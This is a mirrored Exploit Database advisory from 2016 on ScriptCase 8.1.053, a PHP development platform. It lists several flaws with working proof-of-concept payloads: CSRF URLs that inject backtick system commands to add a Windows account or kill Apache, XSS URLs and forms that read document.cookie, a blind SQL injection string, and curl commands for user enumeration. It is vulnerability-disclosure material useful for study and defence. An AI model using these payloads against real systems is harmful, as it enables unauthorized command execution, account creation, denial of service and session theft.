ScriptCase 8.1.053 – Multiple Vulnerabilities

Exploit Database
122 阅读

作者： hyp3rlinx

日期： 2016-11-20
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/40791/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

262

263

264

265

266

267

268

269

270

271

272

273

274

275

276

277

278

279

280

281

282

283

284

285

286

287

288

289

290

291

292

293

294

295

296

297

298

299

300

301

302

303

304

305

306

307

308

309

310

311

312

313

314

315

316

317

318

319

320

321

322

323

324

325

326

327

328

329

330

331

332

333

334

335

336

337

338

339

340

341

342

343

344

345

346

347

348

349

350

351

352

353

354

355

356

357

358

359

360

361

362

363

364

365

366

367

368

369

370

371

372

373

374

375

376

377

[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source: http://hyp3rlinx.altervista.org/advisories/SCRIPTCASE-PHP-WEB-TOOL-MULTIPLE-VULNERABILITIES.txt

[+] ISR: ApparitionSec

Vendor:

==================

www.scriptcase.net

Product:

===================

ScriptCase

v8.1.053, v8.1.051, v8.1.43.0

scriptcase_install_en_us_v8.1.053.exe

hash: ceaba1fce05556b82ab37582a7c907f4

scriptcase_install_en_us_v8.1.051.exe

hash: c3c9fbe085ab5462304c0c73c8698946

ScriptCase RAD is a development platform for PHP applications, is web

oriented and can be installed in a server in the internet.

Vulnerability Type:

=============================

CSRF Remote Command Execution

CSRF Add Admin

SQL Injection

Cross Site Scripting

Local Privlege Escalation (Insecure File Permissions)

User Enumeration / Token Bypass

Downloaded latest version v8.1.053, and still vulnerable.

CVE Reference:

==============

N/A

Vulnerability Details:

=====================

[CSRF Remote Command Execution]

Scriptcase has a remote command execution ailment via CSRF, if an

authenticated user clicks an attacker link etc. This can allow attackers

to run arbitrary system commands on the affected host and do things like

add accounts etc.

Scriptcase PHP code uses encryption / obfuscated so its not easy testing

but we can see here the error returned for PHP eval()'d code

when injecting an Array [] brackets or something as paremeter.

Parse error: syntax error, unexpected end of file, expecting ']' in C:\Program Files (x86)\NetMake\v81\wwwroot\scriptcase\devel\lib\php\functions2.inc.php(358) : eval()'d code on line 1

After trying to wrap a Windows system call in backtick "<code>" operators it

worked perfectly. This allowed me to add an arbitrary system

account to the affected system.

[CSRF]

There are several cross site request forgery vectors, allowing attackers to

add an Admin account to Scriptcase application etc.

[Cross Site Scripting]

Multiple XSS entry points exists within the vulnerable application both GET

and POST.

Example XSS vulnerable scriptcase code 'ajax_cod_apls' is not santized

before being processed by ajax HTTP post request.

$.ajax({

type: 'POST',

url: '/scriptcase/devel/iface/generate.php',

data:

'compile_app_ajax=S&gen_option=console&targ_frame=_self&console=yes&ajax_cod_apls='

+ str_open_apps,

success: function(s_result){

a_result = s_result.split('__compile_ajax_sep_row__');

nm_compile_gerar();

}

});

[Local Privilege Escalation]

scriptcase uses weak insecure file permissions as the “Everyone” group has

full access on it. Allowing low privileged users to

execute arbitrary code in the security context of ANY other users with

elevated privileges on the affected system.

"Everyone" encompasses all users who have logged in with a password as well

as built-in, non-password protected accounts such as Guest

and LOCAL_SERVICE.Any user (even guest) will be able to replace, modify or

change the file. This would allow an attacker the ability

to inject code or replace scriptcase used executables and have it run in

the context of the system.

[User Enumeration]

On failed scriptcase login the application returns one of the following in

the HTTP response.

"The login name provided is not registered on the system."

On a failed password but correct user name entered application HTTP

response returns.

"The password is incorrect."

Exploit code(s):

===============

[CSRF Remote Command Execution]

Note: we NEED to use backtick operators "</code>"

http://127.0.0.1:8081/scriptcase/devel/iface/popup_sql_script.php?sql_script=<code>start net user EVIL abc123 /add

Verify...

c:\> net user

User accounts for \\hyp3rlinx

------------------------------------------------------------------------

Administrator hyp3rlinx Guest

EVIL Test Privileged-User

2) start Windows 'calc.exe'

http://127.0.0.1:8081/scriptcase/devel/iface/popup_sql_script.php?sql_script=<code>calc.exe

http://127.0.0.1:8081/scriptcase/devel/iface/popup_sql_script.php?sql_script=<code>start

calc.exe

**sometimes "calc.exe" doesnt appear but it is running use "tasklist /v |

findstr calc.exe" to verify it is in fact running.

4) Apache DOS (needs httpd environmental variable set)

http://127.0.0.1:8081/scriptcase/devel/iface/popup_sql_script.php?sql_script=<code>taskkill /f /im httpd.exe

[SQL Injection]

AND boolean-based blind - WHERE or HAVING clause in 'nrLinhas' parameter "10 AND 2=2"

</form>

[CSRF Add Admin]

</form>

[CSRF mysql connect creation wizard]

<form action="

http://127.0.0.1:8081/scriptcase/devel/iface/admin_sys_allconections_create_wizard.php" method="post">

</form>

[Cross Site Scripting] - Successful in Firefox

XSS 1)

http://127.0.0.1:8081/scriptcase/devel/iface/app_import.php?option=%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

XSS 2)

http://127.0.0.1:8081/scriptcase/devel/iface/popup_sql_script.php?sql_script=%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

XSS 3)

<form action="http://127.0.0.1:8081/scriptcase/devel/iface/generate.php"

method="post">

<input type="hidden" name="ajax_cod_apls"

value="<script>alert(document.cookie)</script>"/>

</form>

XSS 4)

<form action="http://127.0.0.1:8081/scriptcase/devel/iface/admin_user.php"

method="post">

<input type="hidden" name="filtroTexto"

value='"/><script>alert(document.cookie)</script>'>

</form>

[Local Privilege Escalations]

Proof.

C:\Program Files (x86)\NetMake\v81\components>cacls * | findstr Everyone |

C:\Program Files (x86)\NetMake\v81\components\apache Everyone:(ID)F

Everyone:(OI)(CI)(IO)(ID)

C:\Program Files (x86)\NetMake\v81\components\msodbcsql_x64.msi

Everyone:(ID)F

C:\Program Files (x86)\NetMake\v81\components\msodbcsql_x86.msi

Everyone:(ID)F

C:\Program Files (x86)\NetMake\v81\components\php Everyone:(ID)F

Everyone:(OI)(CI)(IO)(ID)F

C:\Program Files (x86)\NetMake\v81\wwwroot>cacls * | findstr Everyone | more

C:\Program Files (x86)\NetMake\v81\wwwroot\favicon.ico Everyone:(ID)F

C:\Program Files (x86)\NetMake\v81\wwwroot\index.php Everyone:(ID)F

C:\Program Files (x86)\NetMake\v81\wwwroot\robots.txt Everyone:(ID)F

C:\Program Files (x86)\NetMake\v81\wwwroot\scriptcase Everyone:(ID)F

Everyone:(OI)(CI)(IO)(ID)F

[User Account Enumeration / Token Bypass]

First off the stupid token used on the login FORM e.g. "form_login=<TOKEN>"

is totally useless you can put anything you like in it

and the application will happily process the request.

CURL Enumeration 1)

curl -i -v -X POST

http://127.0.0.1:8081/scriptcase/devel/iface/login.php?rand= -d

field_user=BOZO -d field_pass=1 -d ajax=nm -d option=login -d

form_login=STUPID-TOKEN -d language=en_US

HTTP Response:

"error1:The login name provided is not registered on the system."

CURL Enumeration 2)

curl -i -v -X POST

http://127.0.0.1:8081/scriptcase/devel/iface/login.php?rand= -d

field_user=admin -d field_pass=1 -d ajax=nm -d option=login -d

form_login=STUPID-TOKEN -d language=en_US

HTTP Response:

"error1:The password is incorrect."

Either way we know when we hit a valid account.

Disclosure Timeline:

=========================================

Vendor Notification: October 13, 2016

Vendor acknowledgement: October 14, 2016

Vendor request POC video: October 14, 2016

Sent vendor video link: October 14, 2016

Request update from vendor: October 17, 2016

Vendor reply: "under review"

Vendor requests video again: October 25, 2016

Request update from vendor: October 30, 2016

Vendor reply: "No information"

Request ETA: November 7, 2016

Request status: November 14, 2016

Vendor Unresponsive No More Replies

November 20, 2016 : Public Disclosure

Exploitation Technique:

=======================

Remote / Local

Severity Level:

================

High

[+] Disclaimer

The information contained within this advisory is supplied "as-is" with no

warranties or guarantees of fitness of use or otherwise.

Permission is hereby granted for the redistribution of this advisory,

provided that it is not altered except by reformatting it, and

that due credit is given. Permission is explicitly given for insertion in

vulnerability databases and similar, provided that due credit

is given to the author. The author is not responsible for any misuse of the

information contained herein and accepts no responsibility

for any damage caused by the use or misuse of this information. The author

prohibits any malicious use of security related information

or exploits by the author or elsewhere.